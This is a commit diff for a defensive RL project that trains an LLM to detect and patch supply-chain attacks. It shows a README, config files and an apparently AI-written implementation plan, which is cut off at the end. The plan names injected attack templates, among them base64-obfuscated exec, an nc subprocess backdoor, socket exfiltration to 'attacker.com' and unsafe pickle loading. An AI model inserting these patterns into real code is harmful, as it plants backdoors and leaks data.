Spaces:
Running
Running
added initial
Browse files- README.md +118 -1
- config.yaml +28 -0
- docker/Dockerfile.sandbox +5 -0
- docs/implementation +277 -0
- requirements.txt +15 -0
- sentinel_synth/__init__.py +0 -0
- sentinel_synth/config.py +80 -0
- sentinel_synth/dashboard/__init__.py +0 -0
- sentinel_synth/dashboard/app.py +169 -0
- sentinel_synth/data/__init__.py +0 -0
- sentinel_synth/data/benign/ds_binarysearch.py +13 -0
- sentinel_synth/data/benign/ds_linkedlist.py +19 -0
- sentinel_synth/data/benign/ds_queue.py +15 -0
- sentinel_synth/data/benign/ds_sorting.py +8 -0
- sentinel_synth/data/benign/ds_stack.py +15 -0
- sentinel_synth/data/benign/io_config.py +15 -0
- sentinel_synth/data/benign/io_csv.py +11 -0
- sentinel_synth/data/benign/io_json.py +5 -0
- sentinel_synth/data/benign/io_log.py +8 -0
- sentinel_synth/data/benign/io_template.py +6 -0
- sentinel_synth/data/benign/math_factorial.py +5 -0
- sentinel_synth/data/benign/math_fibonacci.py +7 -0
- sentinel_synth/data/benign/math_gcd.py +5 -0
- sentinel_synth/data/benign/math_matrix.py +3 -0
- sentinel_synth/data/benign/math_prime.py +8 -0
- sentinel_synth/data/benign/misc_calc.py +13 -0
- sentinel_synth/data/benign/misc_date.py +3 -0
- sentinel_synth/data/benign/misc_password.py +8 -0
- sentinel_synth/data/benign/misc_temp.py +7 -0
- sentinel_synth/data/benign/misc_url.py +11 -0
- sentinel_synth/data/benign/str_anagram.py +3 -0
- sentinel_synth/data/benign/str_caesar.py +10 -0
- sentinel_synth/data/benign/str_palindrome.py +4 -0
- sentinel_synth/data/benign/str_slug.py +6 -0
- sentinel_synth/data/benign/str_wordcount.py +7 -0
- sentinel_synth/data/generate_scenarios.py +253 -0
- sentinel_synth/data/scenarios.json +402 -0
- sentinel_synth/data/sdk_config.yaml +33 -0
- sentinel_synth/envs/__init__.py +0 -0
- sentinel_synth/envs/sentinel_env.py +175 -0
- sentinel_synth/tests/__init__.py +0 -0
- sentinel_synth/tests/test_validator.py +57 -0
- sentinel_synth/training/__init__.py +0 -0
- sentinel_synth/training/train_grpo.py +187 -0
- sentinel_synth/validation/__init__.py +0 -0
- sentinel_synth/validation/docker_runner.py +107 -0
- sentinel_synth/validation/patch_validator.py +87 -0
- setup.py +15 -0
README.md
CHANGED
|
@@ -1 +1,118 @@
|
|
| 1 |
-
#
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
# 🦅 Sentinel-Synth: Autonomous Supply-Chain Guard
|
| 2 |
+
|
| 3 |
+
**Sentinel-Synth** is an advanced Reinforcement Learning (RL) platform designed for the detection, analysis, and automated patching of software supply-chain vulnerabilities. It leverages **Group Relative Policy Optimization (GRPO)** and **Meta's Synthetic Data Kit** to train fine-tuned LLM agents that can secure CI/CD pipelines autonomously.
|
| 4 |
+
|
| 5 |
+
---
|
| 6 |
+
|
| 7 |
+
## 🏗 System Architecture
|
| 8 |
+
|
| 9 |
+
The Sentinel-Synth ecosystem is built on four functional pillars:
|
| 10 |
+
|
| 11 |
+
```mermaid
|
| 12 |
+
graph TD
|
| 13 |
+
A[Meta SDK / Mutation Engine] -->|Synthetic Scenarios| B[Scenarios JSON]
|
| 14 |
+
B --> C[Gymnasium RL Environment]
|
| 15 |
+
C -->|Observations| D["GRPO Policy Agent (Qwen2.5-Coder)"]
|
| 16 |
+
D -->|Actions| C
|
| 17 |
+
C -->|Validation| E[Docker Sandbox & Patch Validator]
|
| 18 |
+
E -->|Reward Signal| D
|
| 19 |
+
D -->|Metrics| F[W&B / Dashboard]
|
| 20 |
+
```
|
| 21 |
+
|
| 22 |
+
### Core Components
|
| 23 |
+
- **`sentinel_synth.data`**: Orchestrates scenario synthesis using Meta's `synthetic-data-kit` (Track A) and a custom mutation engine (Track B).
|
| 24 |
+
- **`sentinel_synth.envs`**: A `gymnasium` environment that formalizes DevSecOps tasks into an RL problem.
|
| 25 |
+
- **`sentinel_synth.validation`**: A two-tiered execution engine that uses isolated Docker containers for syntax checking and re-attack verification.
|
| 26 |
+
- **`sentinel_synth.training`**: The training loop using `trl` and `unsloth` for efficient GRPO fine-tuning.
|
| 27 |
+
|
| 28 |
+
---
|
| 29 |
+
|
| 30 |
+
## 🚀 Getting Started
|
| 31 |
+
|
| 32 |
+
### 1. Prerequisites
|
| 33 |
+
- **Python 3.10+** (3.11 recommended)
|
| 34 |
+
- **Docker** (Ensure your user has permission to manage containers)
|
| 35 |
+
- **vLLM Server** (Optional, for Track A synthetic data generation)
|
| 36 |
+
- **GPU** (NVIDIA/AMD) for standard training; CPU supported for dry-runs.
|
| 37 |
+
|
| 38 |
+
### 2. Installation
|
| 39 |
+
```bash
|
| 40 |
+
# Set up a virtual environment (recommended)
|
| 41 |
+
python3 -m venv venv
|
| 42 |
+
source venv/bin/activate
|
| 43 |
+
|
| 44 |
+
# Install the base system
|
| 45 |
+
pip install -r requirements.txt
|
| 46 |
+
pip install -e .
|
| 47 |
+
|
| 48 |
+
# Build the sandbox Docker image
|
| 49 |
+
docker build -t sentinel-sandbox:latest -f docker/Dockerfile.sandbox .
|
| 50 |
+
```
|
| 51 |
+
|
| 52 |
+
### 3. Configuration
|
| 53 |
+
Copy the sample environment file and adjust your settings:
|
| 54 |
+
```bash
|
| 55 |
+
cp .env.example .env # Define model paths, W&B keys, etc.
|
| 56 |
+
```
|
| 57 |
+
Edit `config.yaml` to tune training hyperparameters and environment thresholds.
|
| 58 |
+
|
| 59 |
+
---
|
| 60 |
+
|
| 61 |
+
## 🧪 Detailed Workflow
|
| 62 |
+
|
| 63 |
+
### 📤 Phase 1: Data Generation & Analysis
|
| 64 |
+
Sentinel-Synth generates diverse training scenarios including Typosquatting, Obfuscated Exec, and Subprocess Backdoors.
|
| 65 |
+
|
| 66 |
+
**Using Meta's Synthetic Data Kit (Track A):**
|
| 67 |
+
1. Ensure a vLLM server is running.
|
| 68 |
+
2. Configure `sentinel_synth/data/sdk_config.yaml`.
|
| 69 |
+
3. Run the generator:
|
| 70 |
+
```bash
|
| 71 |
+
python3 -m sentinel_synth.data.generate_scenarios --use-sdk --output data/scenarios.json
|
| 72 |
+
```
|
| 73 |
+
|
| 74 |
+
**Using the Mutation Engine (Track B):**
|
| 75 |
+
This mode takes benign code and injects malicious patterns deterministically.
|
| 76 |
+
```bash
|
| 77 |
+
python3 -m sentinel_synth.data.generate_scenarios --output data/scenarios.json
|
| 78 |
+
```
|
| 79 |
+
|
| 80 |
+
---
|
| 81 |
+
|
| 82 |
+
### 🧠 Phase 2: Agent Training (GRPO)
|
| 83 |
+
Train the `Qwen2.5-Coder-7B` model using the novel Group Relative Policy Optimization algorithm. GRPO allows the agent to learn complex decision-making without a value model.
|
| 84 |
+
|
| 85 |
+
**Dry-Run (Pipeline Validation):**
|
| 86 |
+
Test the logic on CPU without a GPU:
|
| 87 |
+
```bash
|
| 88 |
+
python3 -m sentinel_synth.training.train_grpo --dry-run
|
| 89 |
+
```
|
| 90 |
+
|
| 91 |
+
**Full Training:**
|
| 92 |
+
```bash
|
| 93 |
+
# Ensure WANDB is logged in or API key is in .env
|
| 94 |
+
python3 -m sentinel_synth.training.train_grpo --use-docker
|
| 95 |
+
```
|
| 96 |
+
*The agent's reward is shaped by: valid detection (+1.5), successful patching (+4.0), and a penalty for false positives (-2.0).*
|
| 97 |
+
|
| 98 |
+
---
|
| 99 |
+
|
| 100 |
+
### 🛡 Phase 3: Validation & Sandbox Execution
|
| 101 |
+
Every patch proposed by the agent is autonomously validated in a secure Docker sandbox:
|
| 102 |
+
1. **Syntax Check**: Ensuring the code is parseable.
|
| 103 |
+
2. **Functional Test**: Running the unit tests from `scenarios.json`.
|
| 104 |
+
3. **Re-Attack Verification**: The system re-executes the vulnerability payload to verify the patch actually neutralized the threat (e.g., checking if suspicious file writes or network calls stopped).
|
| 105 |
+
|
| 106 |
+
---
|
| 107 |
+
|
| 108 |
+
## 📊 Monitoring & UI
|
| 109 |
+
- **Weights & Biases**: Real-time tracking of mean rewards, action distributions, and loss curves.
|
| 110 |
+
- **Streamlit Dashboard**: A professional interface for interactive analysis:
|
| 111 |
+
```bash
|
| 112 |
+
streamlit run sentinel_synth/dashboard/app.py
|
| 113 |
+
```
|
| 114 |
+
|
| 115 |
+
---
|
| 116 |
+
|
| 117 |
+
## 📄 License
|
| 118 |
+
Sentinel-Synth is licensed under the Apache 2.0 License. See the LICENSE file for details.
|
config.yaml
ADDED
|
@@ -0,0 +1,28 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
# ============================================================
|
| 2 |
+
# Sentinel-Synth Training & Pipeline Configuration
|
| 3 |
+
# All tunable hyperparameters live here
|
| 4 |
+
# ============================================================
|
| 5 |
+
|
| 6 |
+
data_generation:
|
| 7 |
+
num_samples: 10
|
| 8 |
+
output_format: "json"
|
| 9 |
+
benign_dir: "sentinel_synth/data/benign/"
|
| 10 |
+
scenarios_output: "sentinel_synth/data/scenarios.json"
|
| 11 |
+
sdk_config: "sentinel_synth/data/sdk_config.yaml"
|
| 12 |
+
|
| 13 |
+
training:
|
| 14 |
+
learning_rate: 0.000001
|
| 15 |
+
group_size: 4
|
| 16 |
+
max_seq_len: 1024
|
| 17 |
+
max_steps: 100
|
| 18 |
+
gradient_accumulation_steps: 4
|
| 19 |
+
ppo_clip_eps: 0.2
|
| 20 |
+
lora_r: 16
|
| 21 |
+
lora_alpha: 16
|
| 22 |
+
lora_dropout: 0
|
| 23 |
+
output_dir: "grpo_lora"
|
| 24 |
+
|
| 25 |
+
environment:
|
| 26 |
+
max_steps: 5
|
| 27 |
+
use_docker: false
|
| 28 |
+
sandbox_timeout_sec: 5
|
docker/Dockerfile.sandbox
ADDED
|
@@ -0,0 +1,5 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
FROM python:3.11-slim
|
| 2 |
+
RUN useradd -m sandbox
|
| 3 |
+
USER sandbox
|
| 4 |
+
WORKDIR /app
|
| 5 |
+
CMD ["python", "script.py"]
|
docs/implementation
ADDED
|
@@ -0,0 +1,277 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
# Sentinel-Synth Phase 1 — Implementation Plan
|
| 2 |
+
|
| 3 |
+
## Goal
|
| 4 |
+
|
| 5 |
+
Build the complete Sentinel-Synth system: an RL-based supply-chain attack detection platform with synthetic data generation, a Gymnasium environment, Docker-sandboxed validation, GRPO training (Unsloth + W&B), and a Streamlit dashboard.
|
| 6 |
+
|
| 7 |
+
## Project Structure
|
| 8 |
+
|
| 9 |
+
```
|
| 10 |
+
PatchHawk/
|
| 11 |
+
├── sentinel_synth/
|
| 12 |
+
│ ├── __init__.py
|
| 13 |
+
│ ├── envs/
|
| 14 |
+
│ │ ├── __init__.py
|
| 15 |
+
│ │ └── sentinel_env.py # Gymnasium RL environment
|
| 16 |
+
│ ├── data/
|
| 17 |
+
│ │ ├── __init__.py
|
| 18 |
+
│ │ ├── generate_scenarios.py # Synthetic data pipeline
|
| 19 |
+
│ │ ├── benign/ # 20-30 benign Python files
|
| 20 |
+
│ │ └── scenarios.json # Generated dataset (output)
|
| 21 |
+
│ ├── validation/
|
| 22 |
+
│ │ ├── __init__.py
|
| 23 |
+
│ │ ├── docker_runner.py # Docker sandbox execution
|
| 24 |
+
│ │ └── patch_validator.py # 3-step patch validation
|
| 25 |
+
│ ├── training/
|
| 26 |
+
│ │ ├── __init__.py
|
| 27 |
+
│ │ └── train_grpo.py # GRPO + Unsloth + W&B training
|
| 28 |
+
│ ├── dashboard/
|
| 29 |
+
│ │ └── app.py # Streamlit demo UI
|
| 30 |
+
│ └── tests/
|
| 31 |
+
│ ├── __init__.py
|
| 32 |
+
│ └── test_validator.py # Unit tests for validator
|
| 33 |
+
├── docker/
|
| 34 |
+
│ └── Dockerfile.sandbox # Lightweight Python sandbox
|
| 35 |
+
├── requirements.txt
|
| 36 |
+
├── setup.py
|
| 37 |
+
└── README.md
|
| 38 |
+
```
|
| 39 |
+
|
| 40 |
+
---
|
| 41 |
+
|
| 42 |
+
## Proposed Changes
|
| 43 |
+
|
| 44 |
+
### Component 1: Benign Code Corpus (`sentinel_synth/data/benign/`)
|
| 45 |
+
|
| 46 |
+
#### [NEW] 25 benign Python files
|
| 47 |
+
|
| 48 |
+
Create 25 small, self-contained Python files that serve as the benign corpus for mutation. Categories:
|
| 49 |
+
- **Math utilities** (5): fibonacci, factorial, prime check, gcd, matrix ops
|
| 50 |
+
- **String utilities** (5): palindrome, anagram, caesar cipher, word count, slug generator
|
| 51 |
+
- **Data structures** (5): stack, queue, linked list, binary search, sorting
|
| 52 |
+
- **File/IO utilities** (5): CSV parser, JSON formatter, config reader, log parser, template engine
|
| 53 |
+
- **Misc** (5): temperature converter, password validator, date formatter, calculator, URL parser
|
| 54 |
+
|
| 55 |
+
Each file exports a main function with docstring and is testable with simple assertions.
|
| 56 |
+
|
| 57 |
+
---
|
| 58 |
+
|
| 59 |
+
### Component 2: Synthetic Data Generator (`sentinel_synth/data/generate_scenarios.py`)
|
| 60 |
+
|
| 61 |
+
#### [NEW] [generate_scenarios.py](file:///home/ram/Ram/repos/PatchHawk/sentinel_synth/data/generate_scenarios.py)
|
| 62 |
+
|
| 63 |
+
**Key design decisions:**
|
| 64 |
+
- **Track A (Meta synthetic-data-kit)**: Will be implemented as a pluggable module. Since it requires a running vLLM server with Llama 3 8B, the generator will have a `--use-sdk` flag. When disabled, it generates SDK-style examples from hardcoded templates (for offline/demo use).
|
| 65 |
+
- **Track B (Mutation engine)**: Deterministic mutation of benign files using 8 attack templates.
|
| 66 |
+
- Output: `scenarios.json` with 50+ entries.
|
| 67 |
+
|
| 68 |
+
**Attack templates (8):**
|
| 69 |
+
1. Typosquatting import (`import pythonn`)
|
| 70 |
+
2. Obfuscated exec (`exec(base64.b64decode(...))`)
|
| 71 |
+
3. Environment variable hijack (`os.environ['PATH'] = '/tmp'`)
|
| 72 |
+
4. Subprocess backdoor (`subprocess.call(['nc', ...])`)
|
| 73 |
+
5. Pickle deserialization (`pickle.loads(untrusted)`)
|
| 74 |
+
6. Hidden eval in decorator (`eval(user_input)`)
|
| 75 |
+
7. Socket exfiltration (`socket.connect(('attacker.com', 80))`)
|
| 76 |
+
8. Malicious `__import__` (`__import__('os').system('...')`)
|
| 77 |
+
|
| 78 |
+
**Scenario JSON schema:**
|
| 79 |
+
```json
|
| 80 |
+
{
|
| 81 |
+
"id": "tp_001",
|
| 82 |
+
"type": "true_positive|false_positive|functional",
|
| 83 |
+
"code_snippet": "...",
|
| 84 |
+
"patch": "...|null",
|
| 85 |
+
"unit_test_code": "...|null",
|
| 86 |
+
"label": "malicious|benign",
|
| 87 |
+
"source": "mutation_engine|synthetic_data_kit|manual",
|
| 88 |
+
"attack_type": "typosquatting|obfuscated_exec|...|null"
|
| 89 |
+
}
|
| 90 |
+
```
|
| 91 |
+
|
| 92 |
+
---
|
| 93 |
+
|
| 94 |
+
### Component 3: Docker Sandbox (`docker/Dockerfile.sandbox` + `sentinel_synth/validation/docker_runner.py`)
|
| 95 |
+
|
| 96 |
+
#### [NEW] [Dockerfile.sandbox](file:///home/ram/Ram/repos/PatchHawk/docker/Dockerfile.sandbox)
|
| 97 |
+
|
| 98 |
+
Minimal Python 3.11-slim image with non-root user, no network, memory/CPU limits.
|
| 99 |
+
|
| 100 |
+
#### [NEW] [docker_runner.py](file:///home/ram/Ram/repos/PatchHawk/sentinel_synth/validation/docker_runner.py)
|
| 101 |
+
|
| 102 |
+
- `run_in_docker(code, timeout_sec=5)` → `{"stdout", "stderr", "exit_code", "network_blocked", "file_writes"}`
|
| 103 |
+
- Uses `docker` Python SDK for container management
|
| 104 |
+
- Automatic temp directory cleanup
|
| 105 |
+
- Graceful container kill on timeout
|
| 106 |
+
|
| 107 |
+
---
|
| 108 |
+
|
| 109 |
+
### Component 4: Patch Validator (`sentinel_synth/validation/patch_validator.py`)
|
| 110 |
+
|
| 111 |
+
#### [NEW] [patch_validator.py](file:///home/ram/Ram/repos/PatchHawk/sentinel_synth/validation/patch_validator.py)
|
| 112 |
+
|
| 113 |
+
Three-step validation pipeline:
|
| 114 |
+
1. **Syntax check**: `py_compile` in Docker
|
| 115 |
+
2. **Unit test execution**: Run scenario's `unit_test_code` against patched code in Docker
|
| 116 |
+
3. **Re-attack verification**: Confirm vulnerability is neutralized by comparing original vs. patched execution telemetry
|
| 117 |
+
|
| 118 |
+
Returns `(bool, str, dict)` — (passed, message, details).
|
| 119 |
+
|
| 120 |
+
---
|
| 121 |
+
|
| 122 |
+
### Component 5: Gymnasium Environment (`sentinel_synth/envs/sentinel_env.py`)
|
| 123 |
+
|
| 124 |
+
#### [NEW] [sentinel_env.py](file:///home/ram/Ram/repos/PatchHawk/sentinel_synth/envs/sentinel_env.py)
|
| 125 |
+
|
| 126 |
+
- Inherits `gymnasium.Env`
|
| 127 |
+
- **Observation space**: `Dict` with `code_snippet` (Text), `static_flags` (Box[5]), `risk_score` (Box[1])
|
| 128 |
+
- **Action space**: `Discrete(5)` — ANALYZE, EXECUTE_SANDBOX, BLOCK_PR, SUBMIT_PATCH, REQUEST_REVIEW
|
| 129 |
+
- `max_steps = 5`
|
| 130 |
+
- `reset()`: Random scenario selection, compute static flags + risk score
|
| 131 |
+
- `step(action)`: Full reward logic per spec (BLOCK=+2/-1, PATCH=+3/-1.5/-1, etc.)
|
| 132 |
+
- Integrates `docker_runner` and `patch_validator`
|
| 133 |
+
|
| 134 |
+
---
|
| 135 |
+
|
| 136 |
+
### Component 6: GRPO Training (`sentinel_synth/training/train_grpo.py`)
|
| 137 |
+
|
| 138 |
+
#### [NEW] [train_grpo.py](file:///home/ram/Ram/repos/PatchHawk/sentinel_synth/training/train_grpo.py)
|
| 139 |
+
|
| 140 |
+
- Load `Qwen2.5-Coder-7B` via Unsloth in 4-bit with LoRA
|
| 141 |
+
- Custom reward function that runs full environment trajectory
|
| 142 |
+
- `GRPOTrainer` from `trl` with group_size=4
|
| 143 |
+
- **W&B integration**: Log per-epoch metrics (mean reward, action distribution, patch success rate, loss)
|
| 144 |
+
- Hyperparameters: `lr=1e-6`, `group_size=4`, `ppo_clip_eps=0.2`, `max_seq_length=1024`
|
| 145 |
+
- Output: LoRA adapter to `./grpo_lora/`
|
| 146 |
+
|
| 147 |
+
> [!IMPORTANT]
|
| 148 |
+
> The training script requires GPU access (MI300X target) and a significant amount of VRAM for even the 4-bit model. During development, we'll include a `--dry-run` mode that validates the pipeline without actually training.
|
| 149 |
+
|
| 150 |
+
---
|
| 151 |
+
|
| 152 |
+
### Component 7: Streamlit Dashboard (`sentinel_synth/dashboard/app.py`)
|
| 153 |
+
|
| 154 |
+
#### [NEW] [app.py](file:///home/ram/Ram/repos/PatchHawk/sentinel_synth/dashboard/app.py)
|
| 155 |
+
|
| 156 |
+
- Code input text area
|
| 157 |
+
- "Analyze" button triggers environment run
|
| 158 |
+
- Display panels: Agent decision, Patch code, Validation result, Docker telemetry
|
| 159 |
+
- Demo mode with pre-loaded examples (1 malicious, 1 benign)
|
| 160 |
+
- Dark-themed UI with Cobalt Blue accent colors
|
| 161 |
+
- W&B run link display
|
| 162 |
+
|
| 163 |
+
---
|
| 164 |
+
|
| 165 |
+
### Component 8: Tests (`sentinel_synth/tests/test_validator.py`)
|
| 166 |
+
|
| 167 |
+
#### [NEW] [test_validator.py](file:///home/ram/Ram/repos/PatchHawk/sentinel_synth/tests/test_validator.py)
|
| 168 |
+
|
| 169 |
+
4 test cases using pytest:
|
| 170 |
+
1. `test_syntax_error_detected` — patch with syntax error → `(False, "Syntax error", ...)`
|
| 171 |
+
2. `test_unit_test_pass` — correct patch → `(True, "Patch is valid", ...)`
|
| 172 |
+
3. `test_unit_test_fail` — broken patch → `(False, "Unit test failed", ...)`
|
| 173 |
+
4. `test_vulnerability_remains` — incomplete patch → `(False, "Vulnerability remains", ...)`
|
| 174 |
+
|
| 175 |
+
---
|
| 176 |
+
|
| 177 |
+
### Component 9: Project Configuration
|
| 178 |
+
|
| 179 |
+
#### [NEW] [requirements.txt](file:///home/ram/Ram/repos/PatchHawk/requirements.txt)
|
| 180 |
+
|
| 181 |
+
```
|
| 182 |
+
gymnasium>=0.29.0
|
| 183 |
+
docker>=7.0.0
|
| 184 |
+
streamlit>=1.30.0
|
| 185 |
+
unsloth>=2024.0
|
| 186 |
+
trl>=0.7.0
|
| 187 |
+
transformers>=4.38.0
|
| 188 |
+
torch>=2.1.0
|
| 189 |
+
wandb>=0.16.0
|
| 190 |
+
pytest>=8.0.0
|
| 191 |
+
peft>=0.8.0
|
| 192 |
+
datasets>=2.16.0
|
| 193 |
+
```
|
| 194 |
+
|
| 195 |
+
#### [NEW] [setup.py](file:///home/ram/Ram/repos/PatchHawk/setup.py)
|
| 196 |
+
|
| 197 |
+
Standard setuptools configuration registering `sentinel_synth` as a package.
|
| 198 |
+
|
| 199 |
+
#### [MODIFY] [README.md](file:///home/ram/Ram/repos/PatchHawk/README.md)
|
| 200 |
+
|
| 201 |
+
Full project documentation with architecture diagram, setup instructions, usage guide, and data flow.
|
| 202 |
+
|
| 203 |
+
---
|
| 204 |
+
|
| 205 |
+
## User Review Required
|
| 206 |
+
|
| 207 |
+
> [!IMPORTANT]
|
| 208 |
+
> **vLLM / Llama 3 dependency**: Track A of the data generator requires a running vLLM server with Llama 3 8B. Should I:
|
| 209 |
+
> - (A) Implement it with a fallback to template-based generation when the server is unavailable?
|
| 210 |
+
> - (B) Skip Track A entirely for Phase 1 and use only the mutation engine (Track B) + manual templates?
|
| 211 |
+
|
| 212 |
+
> [!IMPORTANT]
|
| 213 |
+
> **Docker requirement**: The sandbox and validator require Docker to be installed and the current user to have Docker permissions. Should I add a `--no-docker` mode that simulates sandbox execution for development/testing without Docker?
|
| 214 |
+
|
| 215 |
+
> [!WARNING]
|
| 216 |
+
> **W&B API key**: The training script needs a W&B API key. I'll use `wandb.login()` which reads from `WANDB_API_KEY` env var or prompts interactively. Is this acceptable?
|
| 217 |
+
|
| 218 |
+
---
|
| 219 |
+
|
| 220 |
+
## Open Questions
|
| 221 |
+
|
| 222 |
+
1. **GPU availability**: Is the MI300X available now for testing the training script, or should I focus on making the pipeline work with `--dry-run` first?
|
| 223 |
+
2. **Benign corpus**: Should I create the 25 benign Python files from scratch (my plan), or do you have an existing corpus to use?
|
| 224 |
+
3. **synthetic-data-kit version**: Which version of Meta's synthetic-data-kit should I target? The API may have changed.
|
| 225 |
+
|
| 226 |
+
---
|
| 227 |
+
|
| 228 |
+
## Verification Plan
|
| 229 |
+
|
| 230 |
+
### Automated Tests
|
| 231 |
+
```bash
|
| 232 |
+
# 1. Generate scenarios
|
| 233 |
+
python -m sentinel_synth.data.generate_scenarios --output sentinel_synth/data/scenarios.json
|
| 234 |
+
|
| 235 |
+
# 2. Validate scenarios.json has 50+ entries
|
| 236 |
+
python -c "import json; d=json.load(open('sentinel_synth/data/scenarios.json')); assert len(d)>=50"
|
| 237 |
+
|
| 238 |
+
# 3. Build Docker sandbox image
|
| 239 |
+
docker build -t sentinel-sandbox:latest -f docker/Dockerfile.sandbox .
|
| 240 |
+
|
| 241 |
+
# 4. Run unit tests
|
| 242 |
+
pytest sentinel_synth/tests/test_validator.py -v
|
| 243 |
+
|
| 244 |
+
# 5. Test environment with gym checker
|
| 245 |
+
python -c "import gymnasium; from sentinel_synth.envs.sentinel_env import SentinelEnv; env=SentinelEnv(); gymnasium.utils.env_checker.check_env(env)"
|
| 246 |
+
|
| 247 |
+
# 6. Dry-run training
|
| 248 |
+
python -m sentinel_synth.training.train_grpo --dry-run
|
| 249 |
+
|
| 250 |
+
# 7. Launch dashboard
|
| 251 |
+
streamlit run sentinel_synth/dashboard/app.py
|
| 252 |
+
```
|
| 253 |
+
|
| 254 |
+
### Manual Verification
|
| 255 |
+
- Verify Docker containers are properly isolated (no network, memory limits)
|
| 256 |
+
- Verify W&B dashboard shows training metrics
|
| 257 |
+
- Verify Streamlit dashboard renders correctly with demo examples
|
| 258 |
+
|
| 259 |
+
---
|
| 260 |
+
|
| 261 |
+
## Execution Order
|
| 262 |
+
|
| 263 |
+
```mermaid
|
| 264 |
+
graph TD
|
| 265 |
+
A[1. Project scaffolding + requirements] --> B[2. Benign corpus - 25 files]
|
| 266 |
+
B --> C[3. Data generator + scenarios.json]
|
| 267 |
+
A --> D[4. Dockerfile.sandbox]
|
| 268 |
+
D --> E[5. docker_runner.py]
|
| 269 |
+
E --> F[6. patch_validator.py]
|
| 270 |
+
C --> G[7. sentinel_env.py]
|
| 271 |
+
F --> G
|
| 272 |
+
G --> H[8. train_grpo.py + W&B]
|
| 273 |
+
F --> I[9. test_validator.py]
|
| 274 |
+
H --> J[10. Streamlit dashboard]
|
| 275 |
+
G --> J
|
| 276 |
+
